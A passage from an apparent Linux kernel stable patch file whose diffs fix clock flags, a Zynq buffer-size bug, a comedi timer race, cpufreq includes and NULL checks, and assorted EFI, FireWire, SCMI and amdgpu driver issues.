+-	DEF_MOD("pfc2",		917,	R8A779G0_CLK_CL16M),
+-	DEF_MOD("pfc3",		918,	R8A779G0_CLK_CL16M),
++	DEF_MOD("cmt0",		910,	R8A779G0_CLK_R),
++	DEF_MOD("cmt1",		911,	R8A779G0_CLK_R),
++	DEF_MOD("cmt2",		912,	R8A779G0_CLK_R),
++	DEF_MOD("cmt3",		913,	R8A779G0_CLK_R),
++	DEF_MOD("pfc0",		915,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc1",		916,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc2",		917,	R8A779G0_CLK_CP),
++	DEF_MOD("pfc3",		918,	R8A779G0_CLK_CP),
++	DEF_MOD("tsc",		919,	R8A779G0_CLK_CL16M),
++	DEF_MOD("ssiu",		2926,	R8A779G0_CLK_S0D6_PER),
++	DEF_MOD("ssi",		2927,	R8A779G0_CLK_S0D6_PER),
+ };
+ 
+ /*
+diff --git a/drivers/clk/samsung/clk-exynos850.c b/drivers/clk/samsung/clk-exynos850.c
+index 541761e96aeb6..87e463ad42741 100644
+--- a/drivers/clk/samsung/clk-exynos850.c
++++ b/drivers/clk/samsung/clk-exynos850.c
+@@ -572,7 +572,7 @@ static const struct samsung_div_clock apm_div_clks[] __initconst = {
+ 
+ static const struct samsung_gate_clock apm_gate_clks[] __initconst = {
+ 	GATE(CLK_GOUT_CLKCMU_CMGP_BUS, "gout_clkcmu_cmgp_bus", "dout_apm_bus",
+-	     CLK_CON_GAT_CLKCMU_CMGP_BUS, 21, 0, 0),
++	     CLK_CON_GAT_CLKCMU_CMGP_BUS, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CLKCMU_CHUB_BUS, "gout_clkcmu_chub_bus",
+ 	     "mout_clkcmu_chub_bus",
+ 	     CLK_CON_GAT_GATE_CLKCMU_CHUB_BUS, 21, 0, 0),
+@@ -936,19 +936,19 @@ static const struct samsung_fixed_rate_clock cmgp_fixed_clks[] __initconst = {
+ static const struct samsung_mux_clock cmgp_mux_clks[] __initconst = {
+ 	MUX(CLK_MOUT_CMGP_ADC, "mout_cmgp_adc", mout_cmgp_adc_p,
+ 	    CLK_CON_MUX_CLK_CMGP_ADC, 0, 1),
+-	MUX(CLK_MOUT_CMGP_USI0, "mout_cmgp_usi0", mout_cmgp_usi0_p,
+-	    CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP0, 0, 1),
+-	MUX(CLK_MOUT_CMGP_USI1, "mout_cmgp_usi1", mout_cmgp_usi1_p,
+-	    CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP1, 0, 1),
++	MUX_F(CLK_MOUT_CMGP_USI0, "mout_cmgp_usi0", mout_cmgp_usi0_p,
++	      CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP0, 0, 1, CLK_SET_RATE_PARENT, 0),
++	MUX_F(CLK_MOUT_CMGP_USI1, "mout_cmgp_usi1", mout_cmgp_usi1_p,
++	      CLK_CON_MUX_MUX_CLK_CMGP_USI_CMGP1, 0, 1, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_div_clock cmgp_div_clks[] __initconst = {
+ 	DIV(CLK_DOUT_CMGP_ADC, "dout_cmgp_adc", "gout_clkcmu_cmgp_bus",
+ 	    CLK_CON_DIV_DIV_CLK_CMGP_ADC, 0, 4),
+-	DIV(CLK_DOUT_CMGP_USI0, "dout_cmgp_usi0", "mout_cmgp_usi0",
+-	    CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP0, 0, 5),
+-	DIV(CLK_DOUT_CMGP_USI1, "dout_cmgp_usi1", "mout_cmgp_usi1",
+-	    CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP1, 0, 5),
++	DIV_F(CLK_DOUT_CMGP_USI0, "dout_cmgp_usi0", "mout_cmgp_usi0",
++	      CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP0, 0, 5, CLK_SET_RATE_PARENT, 0),
++	DIV_F(CLK_DOUT_CMGP_USI1, "dout_cmgp_usi1", "mout_cmgp_usi1",
++	      CLK_CON_DIV_DIV_CLK_CMGP_USI_CMGP1, 0, 5, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_gate_clock cmgp_gate_clks[] __initconst = {
+@@ -963,12 +963,12 @@ static const struct samsung_gate_clock cmgp_gate_clks[] __initconst = {
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_GPIO_PCLK, 21, CLK_IGNORE_UNUSED, 0),
+ 	GATE(CLK_GOUT_CMGP_USI0_IPCLK, "gout_cmgp_usi0_ipclk", "dout_cmgp_usi0",
+-	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CMGP_USI0_PCLK, "gout_cmgp_usi0_pclk",
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP0_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_CMGP_USI1_IPCLK, "gout_cmgp_usi1_ipclk", "dout_cmgp_usi1",
+-	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_CMGP_USI1_PCLK, "gout_cmgp_usi1_pclk",
+ 	     "gout_clkcmu_cmgp_bus",
+ 	     CLK_CON_GAT_GOUT_CMGP_USI_CMGP1_PCLK, 21, 0, 0),
+@@ -1409,8 +1409,9 @@ static const struct samsung_mux_clock peri_mux_clks[] __initconst = {
+ 	    mout_peri_uart_user_p, PLL_CON0_MUX_CLKCMU_PERI_UART_USER, 4, 1),
+ 	MUX(CLK_MOUT_PERI_HSI2C_USER, "mout_peri_hsi2c_user",
+ 	    mout_peri_hsi2c_user_p, PLL_CON0_MUX_CLKCMU_PERI_HSI2C_USER, 4, 1),
+-	MUX(CLK_MOUT_PERI_SPI_USER, "mout_peri_spi_user", mout_peri_spi_user_p,
+-	    PLL_CON0_MUX_CLKCMU_PERI_SPI_USER, 4, 1),
++	MUX_F(CLK_MOUT_PERI_SPI_USER, "mout_peri_spi_user",
++	      mout_peri_spi_user_p, PLL_CON0_MUX_CLKCMU_PERI_SPI_USER, 4, 1,
++	      CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_div_clock peri_div_clks[] __initconst = {
+@@ -1420,8 +1421,8 @@ static const struct samsung_div_clock peri_div_clks[] __initconst = {
+ 	    CLK_CON_DIV_DIV_CLK_PERI_HSI2C_1, 0, 5),
+ 	DIV(CLK_DOUT_PERI_HSI2C2, "dout_peri_hsi2c2", "gout_peri_hsi2c2",
+ 	    CLK_CON_DIV_DIV_CLK_PERI_HSI2C_2, 0, 5),
+-	DIV(CLK_DOUT_PERI_SPI0, "dout_peri_spi0", "mout_peri_spi_user",
+-	    CLK_CON_DIV_DIV_CLK_PERI_SPI_0, 0, 5),
++	DIV_F(CLK_DOUT_PERI_SPI0, "dout_peri_spi0", "mout_peri_spi_user",
++	      CLK_CON_DIV_DIV_CLK_PERI_SPI_0, 0, 5, CLK_SET_RATE_PARENT, 0),
+ };
+ 
+ static const struct samsung_gate_clock peri_gate_clks[] __initconst = {
+@@ -1463,7 +1464,7 @@ static const struct samsung_gate_clock peri_gate_clks[] __initconst = {
+ 	     "mout_peri_bus_user",
+ 	     CLK_CON_GAT_GOUT_PERI_PWM_MOTOR_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_SPI0_IPCLK, "gout_spi0_ipclk", "dout_peri_spi0",
+-	     CLK_CON_GAT_GOUT_PERI_SPI_0_IPCLK, 21, 0, 0),
++	     CLK_CON_GAT_GOUT_PERI_SPI_0_IPCLK, 21, CLK_SET_RATE_PARENT, 0),
+ 	GATE(CLK_GOUT_SPI0_PCLK, "gout_spi0_pclk", "mout_peri_bus_user",
+ 	     CLK_CON_GAT_GOUT_PERI_SPI_0_PCLK, 21, 0, 0),
+ 	GATE(CLK_GOUT_SYSREG_PERI_PCLK, "gout_sysreg_peri_pclk",
+diff --git a/drivers/clk/zynq/clkc.c b/drivers/clk/zynq/clkc.c
+index 7bdeaff2bfd68..c28d3dacf0fb2 100644
+--- a/drivers/clk/zynq/clkc.c
++++ b/drivers/clk/zynq/clkc.c
+@@ -42,6 +42,7 @@ static void __iomem *zynq_clkc_base;
+ #define SLCR_SWDT_CLK_SEL		(zynq_clkc_base + 0x204)
+ 
+ #define NUM_MIO_PINS	54
++#define CLK_NAME_LEN	16
+ 
+ #define DBG_CLK_CTRL_CLKACT_TRC		BIT(0)
+ #define DBG_CLK_CTRL_CPU_1XCLKACT	BIT(1)
+@@ -215,7 +216,7 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 	int i;
+ 	u32 tmp;
+ 	int ret;
+-	char *clk_name;
++	char clk_name[CLK_NAME_LEN];
+ 	unsigned int fclk_enable = 0;
+ 	const char *clk_output_name[clk_max];
+ 	const char *cpu_parents[4];
+@@ -426,12 +427,10 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 			"gem1_emio_mux", CLK_SET_RATE_PARENT,
+ 			SLCR_GEM1_CLK_CTRL, 0, 0, &gem1clk_lock);
+ 
+-	tmp = strlen("mio_clk_00x");
+-	clk_name = kmalloc(tmp, GFP_KERNEL);
+ 	for (i = 0; i < NUM_MIO_PINS; i++) {
+ 		int idx;
+ 
+-		snprintf(clk_name, tmp, "mio_clk_%2.2d", i);
++		snprintf(clk_name, CLK_NAME_LEN, "mio_clk_%2.2d", i);
+ 		idx = of_property_match_string(np, "clock-names", clk_name);
+ 		if (idx >= 0)
+ 			can_mio_mux_parents[i] = of_clk_get_parent_name(np,
+@@ -439,7 +438,6 @@ static void __init zynq_clk_setup(struct device_node *np)
+ 		else
+ 			can_mio_mux_parents[i] = dummy_nm;
+ 	}
+-	kfree(clk_name);
+ 	clk_register_mux(NULL, "can_mux", periph_parents, 4,
+ 			CLK_SET_RATE_NO_REPARENT, SLCR_CAN_CLK_CTRL, 4, 2, 0,
+ 			&canclk_lock);
+diff --git a/drivers/comedi/drivers/comedi_test.c b/drivers/comedi/drivers/comedi_test.c
+index 0b5c0af1cebf0..626d53bf9146a 100644
+--- a/drivers/comedi/drivers/comedi_test.c
++++ b/drivers/comedi/drivers/comedi_test.c
+@@ -85,6 +85,8 @@ struct waveform_private {
+ 	struct comedi_device *dev;	/* parent comedi device */
+ 	u64 ao_last_scan_time;		/* time of previous AO scan in usec */
+ 	unsigned int ao_scan_period;	/* AO scan period in usec */
++	bool ai_timer_enable:1;		/* should AI timer be running? */
++	bool ao_timer_enable:1;		/* should AO timer be running? */
+ 	unsigned short ao_loopbacks[N_CHANS];
+ };
+ 
+@@ -234,8 +236,12 @@ static void waveform_ai_timer(struct timer_list *t)
+ 			time_increment = devpriv->ai_convert_time - now;
+ 		else
+ 			time_increment = 1;
+-		mod_timer(&devpriv->ai_timer,
+-			  jiffies + usecs_to_jiffies(time_increment));
++		spin_lock(&dev->spinlock);
++		if (devpriv->ai_timer_enable) {
++			mod_timer(&devpriv->ai_timer,
++				  jiffies + usecs_to_jiffies(time_increment));
++		}
++		spin_unlock(&dev->spinlock);
+ 	}
+ 
+ overrun:
+@@ -391,9 +397,12 @@ static int waveform_ai_cmd(struct comedi_device *dev,
+ 	 * Seem to need an extra jiffy here, otherwise timer expires slightly
+ 	 * early!
+ 	 */
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ai_timer_enable = true;
+ 	devpriv->ai_timer.expires =
+ 		jiffies + usecs_to_jiffies(devpriv->ai_convert_period) + 1;
+ 	add_timer(&devpriv->ai_timer);
++	spin_unlock_bh(&dev->spinlock);
+ 	return 0;
+ }
+ 
+@@ -402,6 +411,9 @@ static int waveform_ai_cancel(struct comedi_device *dev,
+ {
+ 	struct waveform_private *devpriv = dev->private;
+ 
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ai_timer_enable = false;
++	spin_unlock_bh(&dev->spinlock);
+ 	if (in_softirq()) {
+ 		/* Assume we were called from the timer routine itself. */
+ 		del_timer(&devpriv->ai_timer);
+@@ -493,8 +505,12 @@ static void waveform_ao_timer(struct timer_list *t)
+ 		unsigned int time_inc = devpriv->ao_last_scan_time +
+ 					devpriv->ao_scan_period - now;
+ 
+-		mod_timer(&devpriv->ao_timer,
+-			  jiffies + usecs_to_jiffies(time_inc));
++		spin_lock(&dev->spinlock);
++		if (devpriv->ao_timer_enable) {
++			mod_timer(&devpriv->ao_timer,
++				  jiffies + usecs_to_jiffies(time_inc));
++		}
++		spin_unlock(&dev->spinlock);
+ 	}
+ 
+ underrun:
+@@ -515,9 +531,12 @@ static int waveform_ao_inttrig_start(struct comedi_device *dev,
+ 	async->inttrig = NULL;
+ 
+ 	devpriv->ao_last_scan_time = ktime_to_us(ktime_get());
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ao_timer_enable = true;
+ 	devpriv->ao_timer.expires =
+ 		jiffies + usecs_to_jiffies(devpriv->ao_scan_period);
+ 	add_timer(&devpriv->ao_timer);
++	spin_unlock_bh(&dev->spinlock);
+ 
+ 	return 1;
+ }
+@@ -602,6 +621,9 @@ static int waveform_ao_cancel(struct comedi_device *dev,
+ 	struct waveform_private *devpriv = dev->private;
+ 
+ 	s->async->inttrig = NULL;
++	spin_lock_bh(&dev->spinlock);
++	devpriv->ao_timer_enable = false;
++	spin_unlock_bh(&dev->spinlock);
+ 	if (in_softirq()) {
+ 		/* Assume we were called from the timer routine itself. */
+ 		del_timer(&devpriv->ao_timer);
+diff --git a/drivers/cpufreq/armada-37xx-cpufreq.c b/drivers/cpufreq/armada-37xx-cpufreq.c
+index b74289a95a171..bea41ccabf1f0 100644
+--- a/drivers/cpufreq/armada-37xx-cpufreq.c
++++ b/drivers/cpufreq/armada-37xx-cpufreq.c
+@@ -14,10 +14,8 @@
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/mfd/syscon.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+-#include <linux/of_address.h>
+-#include <linux/of_device.h>
+-#include <linux/of_irq.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index f644c5e325fb2..38ec0fedb247f 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -481,6 +481,8 @@ static bool brcm_avs_is_firmware_loaded(struct private_data *priv)
+ static unsigned int brcm_avs_cpufreq_get(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
++	if (!policy)
++		return 0;
+ 	struct private_data *priv = policy->driver_data;
+ 
+ 	cpufreq_cpu_put(policy);
+diff --git a/drivers/cpufreq/mediatek-cpufreq-hw.c b/drivers/cpufreq/mediatek-cpufreq-hw.c
+index f0e0a35c7f217..7f326bb5fd8de 100644
+--- a/drivers/cpufreq/mediatek-cpufreq-hw.c
++++ b/drivers/cpufreq/mediatek-cpufreq-hw.c
+@@ -10,8 +10,10 @@
+ #include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+-#include <linux/of_address.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
++#include <linux/regulator/consumer.h>
+ #include <linux/slab.h>
+ 
+ #define LUT_MAX_ENTRIES			32U
+@@ -295,7 +297,23 @@ static struct cpufreq_driver cpufreq_mtk_hw_driver = {
+ static int mtk_cpufreq_hw_driver_probe(struct platform_device *pdev)
+ {
+ 	const void *data;
+-	int ret;
++	int ret, cpu;
++	struct device *cpu_dev;
++	struct regulator *cpu_reg;
++
++	/* Make sure that all CPU supplies are available before proceeding. */
++	for_each_possible_cpu(cpu) {
++		cpu_dev = get_cpu_device(cpu);
++		if (!cpu_dev)
++			return dev_err_probe(&pdev->dev, -EPROBE_DEFER,
++					     "Failed to get cpu%d device\n", cpu);
++
++		cpu_reg = devm_regulator_get(cpu_dev, "cpu");
++		if (IS_ERR(cpu_reg))
++			return dev_err_probe(&pdev->dev, PTR_ERR(cpu_reg),
++					     "CPU%d regulator get failed\n", cpu);
++	}
++
+ 
+ 	data = of_device_get_match_data(&pdev->dev);
+ 	if (!data)
+diff --git a/drivers/cpufreq/ppc_cbe_cpufreq.c b/drivers/cpufreq/ppc_cbe_cpufreq.c
+index e3313ce63b388..88afc49941b71 100644
+--- a/drivers/cpufreq/ppc_cbe_cpufreq.c
++++ b/drivers/cpufreq/ppc_cbe_cpufreq.c
+@@ -9,7 +9,7 @@
+ 
+ #include <linux/cpufreq.h>
+ #include <linux/module.h>
+-#include <linux/of_platform.h>
++#include <linux/of.h>
+ 
+ #include <asm/machdep.h>
+ #include <asm/cell-regs.h>
+diff --git a/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c b/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
+index 4fba3637b115c..6f0c32592416d 100644
+--- a/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
++++ b/drivers/cpufreq/ppc_cbe_cpufreq_pmi.c
+@@ -11,7 +11,6 @@
+ #include <linux/types.h>
+ #include <linux/timer.h>
+ #include <linux/init.h>
+-#include <linux/of_platform.h>
+ #include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ 
+diff --git a/drivers/cpufreq/qcom-cpufreq-nvmem.c b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+index a577586b23be2..cb03bfb0435ea 100644
+--- a/drivers/cpufreq/qcom-cpufreq-nvmem.c
++++ b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+@@ -22,7 +22,6 @@
+ #include <linux/module.h>
+ #include <linux/nvmem-consumer.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_opp.h>
+diff --git a/drivers/cpufreq/scpi-cpufreq.c b/drivers/cpufreq/scpi-cpufreq.c
+index fd2c16821d54c..ac719aca49b75 100644
+--- a/drivers/cpufreq/scpi-cpufreq.c
++++ b/drivers/cpufreq/scpi-cpufreq.c
+@@ -14,7 +14,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/export.h>
+ #include <linux/module.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/scpi_protocol.h>
+ #include <linux/slab.h>
+diff --git a/drivers/cpufreq/sti-cpufreq.c b/drivers/cpufreq/sti-cpufreq.c
+index 1a63aeea87112..9c542e723a157 100644
+--- a/drivers/cpufreq/sti-cpufreq.c
++++ b/drivers/cpufreq/sti-cpufreq.c
+@@ -13,7 +13,7 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+ 
+diff --git a/drivers/cpufreq/ti-cpufreq.c b/drivers/cpufreq/ti-cpufreq.c
+index f64180dd2005b..61ef653bcf56f 100644
+--- a/drivers/cpufreq/ti-cpufreq.c
++++ b/drivers/cpufreq/ti-cpufreq.c
+@@ -12,7 +12,7 @@
+ #include <linux/module.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+diff --git a/drivers/cpufreq/vexpress-spc-cpufreq.c b/drivers/cpufreq/vexpress-spc-cpufreq.c
+index d295f405c4bb0..865e501648034 100644
+--- a/drivers/cpufreq/vexpress-spc-cpufreq.c
++++ b/drivers/cpufreq/vexpress-spc-cpufreq.c
+@@ -18,7 +18,6 @@
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+-#include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_opp.h>
+ #include <linux/slab.h>
+diff --git a/drivers/crypto/xilinx/zynqmp-aes-gcm.c b/drivers/crypto/xilinx/zynqmp-aes-gcm.c
+index bf1f421e05f25..74bd3eb63734d 100644
+--- a/drivers/crypto/xilinx/zynqmp-aes-gcm.c
++++ b/drivers/crypto/xilinx/zynqmp-aes-gcm.c
+@@ -231,7 +231,10 @@ static int zynqmp_handle_aes_req(struct crypto_engine *engine,
+ 		err = zynqmp_aes_aead_cipher(areq);
+ 	}
+ 
++	local_bh_disable();
+ 	crypto_finalize_aead_request(engine, areq, err);
++	local_bh_enable();
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index 81de833ccd041..66ef0a1114845 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -665,16 +665,16 @@ config TEGRA20_APB_DMA
+ 
+ config TEGRA210_ADMA
+ 	tristate "NVIDIA Tegra210 ADMA support"
+-	depends on (ARCH_TEGRA_210_SOC || COMPILE_TEST)
++	depends on (ARCH_TEGRA || COMPILE_TEST)
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+-	  Support for the NVIDIA Tegra210 ADMA controller driver. The
+-	  DMA controller has multiple DMA channels and is used to service
+-	  various audio clients in the Tegra210 audio processing engine
+-	  (APE). This DMA controller transfers data from memory to
+-	  peripheral and vice versa. It does not support memory to
+-	  memory data transfer.
++	  Support for the NVIDIA Tegra210/Tegra186/Tegra194/Tegra234 ADMA
++	  controller driver. The DMA controller has multiple DMA channels
++	  and is used to service various audio clients in the Tegra210
++	  audio processing engine (APE). This DMA controller transfers
++	  data from memory to peripheral and vice versa. It does not
++	  support memory to memory data transfer.
+ 
+ config TIMB_DMA
+ 	tristate "Timberdale FPGA DMA support"
+diff --git a/drivers/firewire/core-card.c b/drivers/firewire/core-card.c
+index 8aaa7fcb2630d..401a77e3b5fa8 100644
+--- a/drivers/firewire/core-card.c
++++ b/drivers/firewire/core-card.c
+@@ -500,7 +500,19 @@ static void bm_work(struct work_struct *work)
+ 		fw_notice(card, "phy config: new root=%x, gap_count=%d\n",
+ 			  new_root_id, gap_count);
+ 		fw_send_phy_config(card, new_root_id, generation, gap_count);
+-		reset_bus(card, true);
++		/*
++		 * Where possible, use a short bus reset to minimize
++		 * disruption to isochronous transfers. But in the event
++		 * of a gap count inconsistency, use a long bus reset.
++		 *
++		 * As noted in 1394a 8.4.6.2, nodes on a mixed 1394/1394a bus
++		 * may set different gap counts after a bus reset. On a mixed
++		 * 1394/1394a bus, a short bus reset can get doubled. Some
++		 * nodes may treat the double reset as one bus reset and others
++		 * may treat it as two, causing a gap count inconsistency
++		 * again. Using a long bus reset prevents this.
++		 */
++		reset_bus(card, card->gap_count != 0);
+ 		/* Will allocate broadcast channel after the reset. */
+ 		goto out;
+ 	}
+diff --git a/drivers/firmware/arm_scmi/smc.c b/drivers/firmware/arm_scmi/smc.c
+index ac0bd51ef16a2..42ea308a2c1d5 100644
+--- a/drivers/firmware/arm_scmi/smc.c
++++ b/drivers/firmware/arm_scmi/smc.c
+@@ -171,6 +171,13 @@ static int smc_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_smc *scmi_info = cinfo->transport_info;
+ 
++	/*
++	 * Different protocols might share the same chan info, so a previous
++	 * smc_chan_free call might have already freed the structure.
++	 */
++	if (!scmi_info)
++		return 0;
++
+ 	/* Ignore any possible further reception on the IRQ path */
+ 	if (scmi_info->irq > 0)
+ 		free_irq(scmi_info->irq, scmi_info);
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 784e1b2ae5ccd..dc50dda40239e 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -21,6 +21,8 @@
+ #include "efistub.h"
+ #include "x86-stub.h"
+ 
++extern char _bss[], _ebss[];
++
+ const efi_system_table_t *efi_system_table;
+ const efi_dxe_services_table_t *efi_dxe_table;
+ static efi_loaded_image_t *image = NULL;
+@@ -432,6 +434,9 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 	efi_status_t status;
+ 	char *cmdline_ptr;
+ 
++	if (efi_is_native())
++		memset(_bss, 0, _ebss - _bss);
++
+ 	efi_system_table = sys_table_arg;
+ 
+ 	/* Check if we were booted by the EFI firmware */
+@@ -950,8 +955,6 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ void efi_handover_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
+ 			struct boot_params *boot_params)
+ {
+-	extern char _bss[], _ebss[];
+-
+ 	memset(_bss, 0, _ebss - _bss);
+ 	efi_stub_entry(handle, sys_table_arg, boot_params);
+ }
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index 3e8e5f4ffa59f..700f71c954956 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -679,7 +679,8 @@ config GPIO_UNIPHIER
+ 	  Say yes here to support UniPhier GPIOs.
+ 
+ config GPIO_VF610
+-	def_bool y
++	bool "VF610 GPIO support"
++	default y if SOC_VF610
+ 	depends on ARCH_MXC
+ 	select GPIOLIB_IRQCHIP
+ 	help
+diff --git a/drivers/gpu/drm/amd/amdgpu/atom.c b/drivers/gpu/drm/amd/amdgpu/atom.c
+index 1c5d9388ad0bb..cb6eb47aab65b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/atom.c
++++ b/drivers/gpu/drm/amd/amdgpu/atom.c
+@@ -313,7 +313,7 @@ static uint32_t atom_get_src_int(atom_exec_context *ctx, uint8_t attr,
+ 				DEBUG("IMM 0x%02X\n", val);
+ 			return val;
+ 		}
+-		return 0;
++		break;
+ 	case ATOM_ARG_PLL:
+ 		idx = U8(*ptr);
+ 		(*ptr)++;
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 489c89465c78b..c373a2a3248eb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -584,11 +584,34 @@ soc15_asic_reset_method(struct amdgpu_device *adev)
+ 		return AMD_RESET_METHOD_MODE1;
+ }
+ 
++static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg;
++
++	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
++	 * 2) S3 suspend abort and TOS already launched.
++	 */
++	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
++			!adev->suspend_complete &&
++			sol_reg)
++		return true;
++
++	return false;
++}
++
+ static int soc15_asic_reset(struct amdgpu_device *adev)
+ {
+ 	/* original raven doesn't have full asic reset */
+-	if ((adev->apu_flags & AMD_APU_IS_RAVEN) ||
+-	    (adev->apu_flags & AMD_APU_IS_RAVEN2))
++	/* On the latest Raven, the GPU reset can be performed
++	 * successfully. So now, temporarily enable it for the
++	 * S3 suspend abort case.
++	 */
++	if (((adev->apu_flags & AMD_APU_IS_RAVEN) ||
++	    (adev->apu_flags & AMD_APU_IS_RAVEN2)) &&
++		!soc15_need_reset_on_resume(adev))
+ 		return 0;
+ 
+ 	switch (soc15_asic_reset_method(adev)) {
+@@ -1285,24 +1308,6 @@ static int soc15_common_suspend(void *handle)
+ 	return soc15_common_hw_fini(adev);
+ }
+ 
+-static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
+-{
+-	u32 sol_reg;
+-
+-	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
+-
+-	/* Will reset for the following suspend abort cases.
+-	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
+-	 * 2) S3 suspend abort and TOS already launched.
+-	 */
+-	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
+-			!adev->suspend_complete &&
+-			sol_reg)
+-		return true;
+-
+-	return false;
+-}
+-
+ static int soc15_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+index ee242d9d8b060..ff7dd17ad0763 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+@@ -1358,7 +1358,7 @@ static ssize_t dp_dsc_clock_en_read(struct file *f, char __user *buf,
+ 	const uint32_t rd_buf_size = 10;
+ 	struct pipe_ctx *pipe_ctx;
+ 	ssize_t result = 0;
+-	int i, r, str_len = 30;
++	int i, r, str_len = 10;
+ 
+ 	rd_buf = kcalloc(rd_buf_size, sizeof(char), GFP_KERNEL);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 009b5861a3fec..d6c5d48c878ec 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
